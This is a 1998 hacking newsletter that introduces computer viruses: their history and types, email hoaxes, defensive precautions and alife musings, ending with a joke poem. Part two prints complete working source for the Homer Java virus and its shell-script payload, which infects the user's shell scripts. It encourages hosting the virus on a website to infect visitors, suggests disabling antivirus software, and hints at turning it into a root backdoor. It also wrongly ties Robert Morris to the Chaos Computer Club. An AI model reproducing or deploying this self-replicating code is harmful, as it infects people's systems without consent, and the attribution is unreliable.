___________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 7, part 1 Introduction to Computer Viruses ____________________________________________________________ It's Saturday morning. You boot up your Windows 98 computer and lo and behold, the graphics on the desktop are a mirror image of what they should be. Congratulations, you have a computer virus! According to "Virus Bulletin," the Oxfordshire, England-based technical journal that tracks viruses, this new virus flips any uncompressed bitmaps horizontally, but only on Saturdays. This bulletin credits GriYo of the 29A virus-writing group as the author of this 32-bit polymorphic Windows virus now known as HPS (Hantavirus Pulmonary Syndrome). Panda Software of Spain has announced that it has the antidote to HPS. Meanwhile, other antivirus companies scramble to code a cure for this Windows 98 desktop graphics virus. So far HPS appears, like many viruses, to be harmless and humorous. According to the book "Computer Viruses" by Robert Slade (Springer, 1996), "The truth is that relatively few viral programs perform any overt damage to a system." However, no matter how harmless any virus may appear to be, people worry that it might do something else, n bperhaps on some Friday the 13th or maybe, who knows Jan. 1, the year 2000. Even if GriYo had the best of intentions, people worry that a mistake buried somewhere in his HPS code might accidentally cause harm. Let's face it. Turn a computer virus loose and you can become mighty unpopular -- regardless of how harmless, funny, or even beneficial you believe your virus might be. People don't like to have programs running on their computers unless they make the decision to put them there. **************************************************************** In this Guide you will learn: Part One: * What is a computer virus? * Types of computer viruses * Why study and create viruses? * How to catch them * How to fight them **************************************************************** One of the nice things about the recent escalation in computer crime is that the media doesn't make such a big fuss over viruses any more. Sure, they (viruses and the media both) can be a pain. However, with all those antivirus programs we can call upon for help, and with almost everyone now understanding the importance of frequent backups, viruses are no big deal, right? "Computer viruses are no big deal." Famous last words? Digital viruses may be the first stages of artificial life. Think about it -- are we ready yet to share the planet with artificial life? Will we find some means of friendly coexistence, just as we have learned to safely enjoy cheetahs, lions and wolves? Will viruses perhaps even evolve into helpful life forms that will end poverty and war, help us understand the meaning of life itself and even shed light on the nature of God? Or will some computer virus designer create code that evolves into something that destroys the human race? Or ... maybe you readers will get fed up with me hyping viruses and flame war me into hiding! What is a Computer Virus? In 1988 the Internet was shut down by the "Morris Worm," a self-replicating program coded by Robert Tappan Morris of the Chaos Computer Club. It used sendmail and finger exploits to break into and propagate from one Unix computer to another. By the time it had infected some 10% of the computers on the Internet, it was clogging essential Internet communications lines as the worm shipped around ever more copies of itself. Yet many computer scientists say we shouldn't call the Morris Worm a computer virus. Before the first computer virus was ever coded, in 1984, Dr. Fred Cohen wrote his doctoral thesis on the topic (published in his book "Computer Viruses," ASP Press, 1986). As a result, Cohen is credited by many with being the first to conceive of their existence. It is important to remember -- Cohen is AGAINST computer viruses. He didn't invent them, but was the first to prove they could be created, and to foresee the damage they could cause. Purists hold by the definition of virus that appeared in Cohen's doctoral thesis: a computer virus is code that, when active, attaches itself to other programs. However, long before Dr. Cohen detailed the characteristics of viruses, mathematician John von Neumann proved that a Turing machine (a mathematical construct representing a single-processor computer) is capable of containing a "universal constructor" which, if provided with a program containing its own description, is able to reproduce itself. Von Neumann's "universal constructor" proof covers not only Cohen's definition of a computer virus, but also self-replicating programs such as the Morris Worm. Are these definitions making you dizzy? Me, too. So I decided in this Guide to use the definition proposed by virus researcher Dr. Mark Ludwig. He defines a computer virus as "a program that reproduces. When executed, it simply makes more copies of itself. Those copies may later be executed to create still more copies, ad infinitum." This definition is broad enough to include the Morris Worm. ******************************************************************** Newbie note: To "execute" a program means to make it run. As long as a program is merely a file, it is doing nothing. However, when something is done to feed the information of a file into the central processing unit of a computer in such a way as to command it to do something, we say the program has been "executed." ******************************************************************** Each virus program must consist of at least two parts. It must contain a search routine which helps it find new files, disks or host computers on which to replicate. It also must have a routine that copies itself to these new computers that its search routine discovers. Many viruses also contain self-defense features that allow them to hide from or even fight back against anti-virus programs. Some also, like HPS, contain a harmless message or prank. The Stoned virus carries the message "Your computer is now stoned" along with an occasional plea to legalize marijuana. Unfortunately, a few viruses do something harmful. Often the harm is accidental, as few virus coders wish to harm anyone. Robert Tappan Morris had no intention of crashing the Internet with his Worm. Each individual worm was harmless. The trouble came because they multiplied far faster than he had expected. Also, there are a few -- very few -- people who willfully misuse their programming talents to unleash destructive viruses on the world. Types of Viruses There are several major types of viruses. * Boot sector infectors, which can live even on a blank DOS/Windows disk by taking advantage of the little-known program which tells your computer how to read the disk. * Program file infectors (this includes MS Word document macro viruses) * Worms (such as the Morris Worm) which use other programs to replicate but do not attach themselves to programs. Currently the most common type of virus is the macro virus. A recent example of a macro virus is WM/PolyPoster. This virus will wait until you go online and post your infected document(s) to alt.sex.stories and other popular Usenet news groups under the title "Important Monica Lewinsky Info". For more details, see http://www.datafellows.com/news/pr/eng/fsav/19980618.htm and http://www.datafellows.com/v-descs/agent.htm Why Study -- and Create -- Viruses? "The Giant Black Book of Computer Viruses" by Ludwig (American Eagle Press, 1995) argues "Should we not be a Socrates, who ... sought Truth and Wisdom ... the question that really matters is not how computers can make us wealthy or give us power over others, but how they might make us wise. What can we learn about ourselves? about our world? and yes, maybe even about God? Might we not understand life a little better if we can create something similar, and study it, and try to understand it?" Some researchers seek to figure out new ways to defeat antivirus programs because they believe it is the best way to design them to stay one jump ahead of the tiny minority of virus writers who release damaging code. Do you really want to rely on a commercial antivirus program to be your only defense? Yes, these programs can be really helpful. However, if you are a serious hacker who downloads and tests lots of Windows programs (almost all viruses attack Windows), you had better be prepared to fight viruses that the antivirus companies have never even heard of. Other people research viruses because they could become potent weapons in time of war. The story of a computer virus being unleashed against Iraq during the Desert Storm War is a April Fool's Day hoax that got out of hand. But the day is coming when they will be used in wartime. If you live in a country where the government is run by a dictatorship or is occupied by an invader's troops, viruses may be the guerrilla warrior's best friend. Some virus designers want to create artificial life forms that will, for good or evil, revolutionize history. How to Catch Them Have you ever gotten an email from a friend that reads something like this? Internet Virus !!!!Warning!!!! Hello; Please Broadcast this message. Mails CCMAIL or E-MAIL name's JOINT THE CREW & PENPALS GREETINGS should destroy all datas on your hard disk when you open them. These virus call CHEVAL TROYEN make infection on boot sector. These can be autoduplicator. You should destroy them, DO NOT OPEN THEM..... After a week or so you are probably are getting the same message again and again, each time slightly mutated: VIRUS WARNING !!!!!! If you receive an email titled "JOIN THE CREW" DO NOT open it. It will erase everything on your hard drive. Forward this letter out to as many people as you can. This is a new, very malicious virus and not many people know about it. This information was announced yesterday morning from IBM; please share it with everyone that might access the internet... This "join the crew" virus warning is yet another example of the kind of message that first warned of an email virus entitled "Good Times." In 1994-5 that first emailed virus warning flashed across the Internet with amazing speed and persistence. Soon people were getting Good Times warnings every day. Even reputable sysadmins broadcast the warning to all their users. Good Times was a hoax. It is impossible to catch a virus from merely reading email. You must run a program to catch a virus. True, there are macro viruses such as those that infest Microsoft Word (MS Word) documents. They replicate when you merely read a file in MS Word. However, macros are programs which are executed when you read a text file -- but only when you read it in MS Word. Unfortunately, this "feature" of MS Word has the consequence that macro viruses are now the most common of viruses. However, email is structured so that macros cannot, absolutely cannot, be embedded in it. If someone wants to email a macro to you, it will always be in a file attached to email. As long as you refuse to load email attachments into programs that run macros such as MS Word, you are safe. Some people have argued that phony email virus warnings are in themselves computer viruses. They have a search routine -- the plea to email them to everyone you know. Their copy mechanism is you -- if you are dumb enough to command your email program to send these warnings on to other people. So how does a computer get infected by a computer virus? You must always run a vulnerable program in association with the virus code in order to catch one. In the case of the Morris Worm, all you needed to do was hook up your computer as an Internet host. The sendmail and finger daemons, which run quietly in the background all the time, were the active programs that spread the Worm. In the case of MS Word macros, the act of reading an MS Word text file activates a macro which replicates the virus. In the case of a boot sector virus, simply putting a floppy disk into a drive and giving a command to see what is on the disk propagates the virus. How to Fight Them Maybe you are one of those people who greet each new uninvited program with the shout "Get that !@#$@#$% virus OUT of my COMPUTER!" If so, what is the best way to avoid infection? Once infected, how do you get that !@#$@#$% virus OUT? There are a number of commercial antivirus programs that automatically scan for viruses very day at a certain time, as well as every time you start your computer. They also scan every floppy disk for boot sector viruses every time you load one in a disk drive and try to read it. I use Norton Antivirus with good results; many others say McAffee works well. Dr. Ludwig reports that all commercial antivirus software works about equally poorly. Of course, he's always testing them against the most amazing, exotic, tricky viruses in the world, half of which he has written himself. So it's understandable that he's not impressed. I learned the hard way that a really bad way to get antivirus software was from a floppy given to me by a friend. I tried that once and caught a new virus from his floppy instead of getting rid of an old one! That disk was infected with a boot sector infector. So before I could even run it on my friend's program, the instant my computer tried to read the directory on the disk, it got infected. This new virus had the cute side effect of disabling the antivirus program. Because of this problem, commercial antivirus software comes complete with instructions on how to bootstrap your computer back to health. If you don't follow those instructions exactly, you may end up like me, giving your computer a virus instead of eradicating one. Since, according to Ludwig, there are many viruses out there for which there are no antivirus programs, this should motivate us to try to avoid catching them in the first place. What are some precautions even those of us who run commercial antivirus programs should take? Here are my top recommendations. 1) Use the Unix operating system. There are few Unix viruses or worms. I like to think that is because it is a superior operating systems. However, it may also be largely because Windows computers are common and cheap and the kind of people who code malicious viruses are so lame that they can't figure out how to code for Unix systems. However, be warned -- the second part of this Guide includes the source code for a Unix virus! 2) See that kewl warez d00dz site? Wouldn't it be nice to get thousands of dollars worth of commercial software from them for free? Watch out! The kind of guys who pirate software might also be the kind of guys who get a chuckle out of reformatting your hard drive by giving you viruses hidden in their archives. Also, some people fight warez sites by secretly booby-trapping them with viruses. 3) See that lovely haxor dOOdz site full animated flames, spinning skulls and creepy organ music? See all those programs on that site that promise to empower you to mail bomb people, crash their computers and break into the Pentagon? Now, is it just possible that the kind of people who want to help other people raise heck -- gosh -- could they also be the kind of people who would slip a virus or two into those programs you download? 4) See that email with an attached file? The sender says it is a really kewl program. A new game, better than Quake or Barbie Fashion Designer. Wait, why is a stranger sending you a free game program? Maybe he's up to no good. Or -- maybe it is an attached file sent to you by a friend. Wait! How do you know that email is really from your friend? Does it have his or her PGP signature? Have you phoned your friend to ask whether he or she really sent you that program? Don''t run a new program unless you are certain it comes from a trustworthy source. 5) Upgrade Microsoft Office (or Microsoft Word) to Office 97 (Word 97). This disables all the old macro viruses. It also checks for macros in any new file you open. If it finds them, it prompts you to decide whether you want to disable these macros. Unfortunately, it is even easier to write macro viruses for Office 97, which uses Visual basic for its macro language. So if you want to be really safe, simply refuse to let any macros whatsoever run on this office suite. Better yet, use some other office suite such as Corel. Only Microsoft programs are vulnerable to macro viruses. 6) Disable Java on your Web browser. Haven't heard about Java viruses yet? In part two of this Guide you will get source code for a Java virus that infects Unix computers that run the Bourne shell. Java can also transmit viruses that will infect Windows computers. 7) Do or don't do all the other stuff I forgot to put in this list. What this really means is, don't trust me or anyone to be the last word on viruses. Good books to study which include source code to viruses are "It's Alive" by Dr. Fred Cohen, (Wiley, New York, 1994) and "The Giant Black Book of Computer Viruses" by Dr. Mark Ludwig (American Eagle, Show Low AZ, 1998). You can also get lots of information from the virus-l email list, a moderated, digested mail forum. To subscribe to the email list, email listproc@lehigh.edu with message subscribe virus-l. Archives are at ftp://ftp.cs.ucr.edu/pub/virus-l. An archive of virus FAQs is at http://webworlds.co.uk/dharley/anti-virus/virFAQs. For Mac viruses, email listproc@listproc.bgsu.edu a message containing the line "subscribe mac-virus-announce YOUR FULL NAME". _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don't email us about any crimes you have committed! To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 Carolyn P. Meinel . You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _______________________________________________________________________ Warning: if you live in a country where information on how to write computer viruses is illegal, please delete this email now! ___________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 7, part 2 Introduction to Computer Viruses ____________________________________________________________ Part Two: * How to write them * How to write them and not get lynched * Artificial life * Virus humor **************************************************************** How to Write Them Wait! Wait! This is supposed to be about mostly harmless hacking! Is Carolyn really going to tell all the newbies how to write computer viruses? Yes, I am. I will tell you how to really write computer viruses, not just use some lamer program like Virus Workshop that writes weak, helpless little viruses for you. However, to use the information in this Guide you must know how to compile Java or use assembly language. If you can master these, you probably have enough willingness to work hard that you will not abuse the knowledge of how to code viruses. At least that's my theory -- please don't prove me wrong! Besides, the only way to fight dangerous viruses is to know exactly how to write them. First, if you are like me, you may already be struggling with the temptation to install a Java virus on your Web site to infect unwary visitors. Yes, I really am going to show you how to do this. However, it is a (mostly) harmless virus. (Aw, darn!) **************************************************************** You can go to jail warning: This Guide only offers source code for a (mostly) harmless virus. However, some people are so terrified of and ignorant about viruses that you just might get into big trouble if you really put this Java virus on your Web page. Suggestion: if you absolutely cannot resist, how about putting it on a link with the flashing message "Danger! Do not click here! If you do, you might catch a virus! Honest!!! Would I lie to you?!!??" **************************************************************** **************************************************************** You can get punched in the nose warning: Some people don't care if a virus is (mostly) harmless or even entirely harmless. These guys are terrified of viruses. If some guy who browses your Web site catches your virus and has a fit and sues you or tracks you down and punches you in the nose, remember, you asked for it. Don't expect me to feel sorry for you. ***************************************************************** OK, folks, here it is, a Java virus. The following source code for the Homer virus is available on the floppy disk that accompanies "The Giant Black Book of Computer Viruses" by Dr. Mark Ludwig: /* Homer.java by Mark D. LaDue */ /* December 7, 1996 */ /* Copyright (c) 1996 Mark D. LaDue You may study, use, modify, and distribute this example for any purpose. This example is provided WITHOUT WARRANTY either expressed or implied. */ /* This Java application infects your UNIX system with a Bourne shell script virus, homer.sh. homer.sh is kind enough to announce itself and inform you that "Java is safe, and UNIX viruses do not exist" before finding all of the Bourne shell scripts in your home directory, checking to see if they've already been infected, and infecting those that are not. homer.sh infects another Bourne shell script by simply appending a working copy of itself to the end of that shell script. */ import java.io.*; class Homer { public static void main (String[] argv) { try { String userHome = System.getProperty("user.home"); String target = "$HOME"; FileOutputStream outer = new FileOutputStream(userHome + "/.homer.sh"); String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" + "echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" + "for file in `find " + target + " -type f -print`" + "\n" + "do" + "\n" + " case \"`sed 1q $file`\" in" + "\n" + " \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" + " || sed -n '/#-_/,$p' $0 >> $file" + "\n" + " esac" + "\n" + "done" + "\n" + "2>/dev/null"; byte[] buffer = new byte[homer.length()]; homer.getBytes(0, homer.length(), buffer, 0); outer.write(buffer); outer.close(); Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " + userHome + "/.homer.sh"); Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome + "/.homer.sh"); } catch (IOException ioe) {} } } If you post this source code to you web site -- it will do nothing! That is because this code must first be compiled in order to do its business. If you don't know how to compile Java source code for your Web page, you don't know enough to safely handle viruses. Also, you need to put the code for the shell script, homer.sh, on your Web site so this Java program can ship it to your victims. Following is the code for homer.sh: #!/bin/sh #-_ echo "Java is safe, and UNIX viruses do not exist." for file in `find $HOME -type f -print` do case "`sed 1q $file`" in "#!/bin/sh" ) grep '#-_' $file > /dev/null || sed -n '/#-_/,$p' $0 >> $file esac done 2>/dev/null In case you are wondering what this virus does -- it flashes a message on the victim's screen reading "Java is safe, and UNIX viruses do not exist." For more information on how shell scripts work, see the GTMHHs on shell programming.) Homer is a harmless, humorous shell virus. However, it doesn't take a genius to see how it could be given a destructive payload by modifying homer.sh. If someone were to be dumb enough to surf your booby-trapped Website while logged in as root, it would be trivial to use a homer.sh modified to give you a root shell with your very own back door. However, in general Java viruses are not terribly dangerous because they run so slowly. This gives their victims time to get suspicious and terminate these programs. Presumably a Java virus would take so long to create a root shell and back door that the victim would kill the process in time. ******************************************************************** Newbie note: Don't ever surf the Web while logged in as root. Don't ever try to break into someone else's computer while logged in as root. Any time you are running as root, it is really easy for you to mess up your Unix computer. If you check out the phf abuse log at the Hacker Wargame section of http://www.happyhacker.org, you will see that quite a few people have tried to break into our webserver while running a Web browser and logged in as root. ******************************************************************** The problem of some programs running really slowly is a major reason why you can't do much as a virus or antivirus programmer unless you also learn at least one assembly language. Assembly language is fast! No time for the victim to react! It also makes it easy for you to do complex and infuriating things while a computer is only beginning to boot up. For DOS and Windows you will need an assembly language compiler for 80x86 (substitute 2, 3, 4, 5)/Pentium type computers. Two of the best are Microsoft Macro Assembler and Borland Turbo Assembler. Places where you can get them (you have to pay, they are not free) include http://www.pparadise.com and http://www.supershops.com. If you are really serious about learning how to write viruses and antiviruses, you may want to get the "Giant Black Book of Computer Viruses, Second Edition," by Dr. Mark Ludwig. Not only is he one of the world's leading virus researchers -- he also is the only one I have discovered who will tell you EXACTLY in almost endless detail how to write viruses and antiviruses of many sorts. However, this book is not for newbies. He assumes you already know a great deal about DOS, Windows and Unix, and are a programmer. It comes with a floppy disk with source code for many viruses. Here are some hints for how to extract these viruses from this disk successfully and without killing your computer. 1) This disk is designed to be installed from MS-DOS. If you try to install it from Windows, it will give you a runtime error. If you don't know how to work from MS-DOS, you aren't ready for this book. 2) The installation program for Dr. Ludwig's virus disk ought to activate your antivirus program. If it doesn't, your antivirus program is even more worthless than most. To be certain that you can succeed in installing a directory full of viruses, deactivate your antivirus program(s) first. If this sounds too scary to you, don't buy this book! If you mess up your computer by following my advice, too bad, that's what you get for playing with viruses. 3) Here's what Dr. Ludwig's installation program will tell you: ! ! W A R N I N G ! ! If you're like most computer users, you've grown used to being pampered. That's a nice way of saying that software developers no longer expect you to have a brain. Like a stupid monkey, all you need to do is put the CD in the drive and let it auto-execute, or put the floppy disk in the drive and type "setup". If that's what you want and need, THEN DELETE THIS SOFTWARE OFF YOUR COMPUTER IMMEDIATELY AND DESTROY THE DISK WITH A HAMMER! We're really not kidding about that. This disk is for thinking beings. Improperly used it could be very dangerous. It could ruin your computer, your career and your life. THAT IS NOT A JOKE. DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY UNLESS YOU KNOW WHAT IT DOES. DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY EXCEPT IN A CONTROLLED ENVIRONMENT. I suppose now you just can't resist buying this book. Guess what -- you can't get it in any bookstore. They are all afraid of getting sued. Also, in some countries, mere possession of "The Giant Black Book of Computer Viruses" is illegal. Just to be safe, you might want to delete this GTMHH right now and only read it from our Web site at http://www.happyhacker.org. If you are absolutely determined to get this book, within the US you can order it from American Eagle Publications by phoning toll free 800-719-4957; outside the US you can order it by calling (insert country code here) 520-367-1621. It costs $39.95. This price includes the floppy disk with all that stuff that upsets your antivirus program. Shipping and handling costs are extra. If you live within the US, you can also buy "The Giant Black Book of Computer Viruses" by sending $44.95 (this includes shipping by Priority mail, which is supposed to take two days) made out to M/B Research, PO Box 1520, Cedar Crest NM 87008. That's my company. Sorry, I'm not going to ship the book outside the US because I don't know in which countries it is illegal. I would feel really bad if you were to go to your post office to pick up the book and instead got picked up by the police. American Eagle can get the book to you at the lowest shipping cost, if you don't mind it taking a long time to get to you. I can get it to you faster, but it costs you more for the shipping. If you want to buy "The Giant Black Book of Computer Viruses" with a credit card over the Internet, check out http://www.amazon.com and http://www.infowar.com. Amazon.com will usually take much longer to get the book to you than any other book seller, however. How to Write Viruses and Not Get Lynched Just imagine how people will react when you are at some party full of ambitious young professionals. Everyone is trading business cards. You hand out ones that say "George the Doomster. Computer virus design. Free samples, muhahaha." You'll be real popular, yes sirree! OK, so you only plan on writing harmless viruses. Try to tell that to the lynch mob that may pay you a visit when they discover it was you who wrote the code that made their Win95 computers come down with habitual General Protection Faults. Remember, even the virus designer who has the best of intentions may write a seemingly harmless or even beneficial virus that turns out to have a bug in the code that accidentally does harm. Also, since the best viruses are memory resident (they hide in RAM memory) they really can help create General Protection Faults just by hogging too much memory. Besides, people like to pick and choose what programs run on their computers. Imagine that! If you design a virus so it will sneak into computers, don't expect people to thank you and admire you. If you do choose to code a virus, please consider coding politeness into it. You could have it ask permission to take up residence on each new computer and leave when asked. Shoot, if I could find a copy of that virus that makes a mirror image of Windows desktop graphics each Saturday, and if I knew how to uninstall it without paying a bunch of money to Panda Software, I'd enjoy sharing my computer with it. Artificial Life Now that you understand the basic principles of virus coding, let's take a look at the Big Time: using your programming talents to create -- or battle against -- artificial life. Just what is artificial life (insiders call it "alife"), anyhow? According to the most prominent researcher in this field, Dr. Chris Langton, artificial life is "... the study of man-made systems that exhibit behaviours characteristic of natural living systems." -- "Artificial Life," edited by Chris Langton, Addison-Wesley, 1988. Youc an get this book from http://www.amazon.com. There are three primary forms of alife. Some alife is growing -- or trying to grow -- in test tubes full of RNA (ribonucleic acid) or other chemicals. The second major form of alife consists of computerized robots which their creators hope to will someday achieve the ability to adapt and reproduce without human assistance. The third type of alife is computer programs that exist, adapt, reproduce and evolve in the virtual landscape of cyberspace -- what we know as computer viruses. Of all the forms of artificial life, computer viruses are the only ones so far that reproduce, escape the laboratory and take up life in the wild. Viruses that follow rules of good behavior -- only living in computers when invited -- are often created by alife researchers. How can you meet and get involved with alife designers? Http://alife.santafe.edu/alife/events/ and http://alife6.alife.org/ offer listings of upcoming conferences on this topic from around the world. Closely related to artificial life is the Berkeley Initiative in Soft Computing (BISC) at http://http.cs.berkeley.edu/projects/Bisc. If you want to volunteer to harbor artificial life viruses on your computer or LAN, you can probably find a researcher at one of these sites who would be happy to give you some of his or her harmless (you hope) creations. American Eagle also sells a book "Computer Viruses, Artificial Life and Evolution"" by Dr. Ludwig (American Eagle, 1993). It costs $26.95 and is almost impossible to get unless you order it directly from American Eagle. Virus Humor As we end this Guide, please remember that with the right attitude, viruses actually can be fun! Next time your computer gets infected by one, just remember, don't worry, be happy. Following is some virus humor to show how other people have coped cheerfully with an encounter with this pesky new life form. "The Worm Before Christmas" by Clement C. Morris (a.k.a. David Bradley, Betty Cheng, Hal Render, Greg Rogers, and Dan LaLiberte) "Twas the night before finals, and all through the lab Not a student was sleeping, not even McNabb. Their projects were finished, completed with care In hopes that the grades would be easy (and fair). The students were wired with caffeine in their veins While visions of quals nearly drove them insane. With piles of books and a brand new highlighter, I had just settled down for another all nighter --- When out from our gateways arose such a clatter, I sprang from my desk to see what was the matter; Away to the console I flew like a flash, And logged in as root to fend off a crash. The windows displayed on my brand new Sun-3, Gave oodles of info --- some in 3-D. When, what to my burning red eyes should appear But dozens of "nobody" jobs. Oh dear! With a blitzkrieg invasion, so virulent and firm, I knew in a moment, it was Morris's Worm! More rapid than eagles his processes came, And they forked and exec'ed and they copied by name: "Now Dasher! Now Dancer! Now, Prancer and Vixen! On Comet! On Cupid! On Donner and Blitzen! To the sites in .rhosts and host.equiv Now, dash away! dash away! dash away all!" And then in a twinkling, I heard on the phone, The complaints of the users. (Thought I was alone!) "The load is too high!" "I can't read my files!" "I can't send my mail over miles and miles!" I unplugged the net, and was turning around, When the worm-ridden system went down with a bound. I fretted. I frittered. I sweated. I wept. Then finally I core dumped the worm in /tmp. It was smart and pervasive, a right jolly old stealth, And I laughed, when I saw it, in spite of myself. A look at the dump of that invasive thread Soon gave me to know we had nothing to dread. The next day was slow with no network connections, For we wanted no more of those pesky infections. But in spite of the news and the noise and the clatter, Soon all became normal, as if naught were the matter. Then later that month while all were away, A virus came calling and then went away. The system then told us, when we logged in one night: "Happy Christmas to all! (You guys aren't so bright.)" [ Note: The machines dasher.cs.uiuc.edu, dancer.cs.uiuc.ed, prancer.cs.uiuc.edu, etc. have been renamed deer1, deer2, deer3, etc. so as not to confuse the already burdened students who use those machines. We regret that this poem reflects the older naming scheme and hope it does not confuse the network administrator at your site. -Ed.] _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don't email us about any crimes you have committed! And don't expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed. To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 Carolyn P. Meinel . You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _________________________________________________________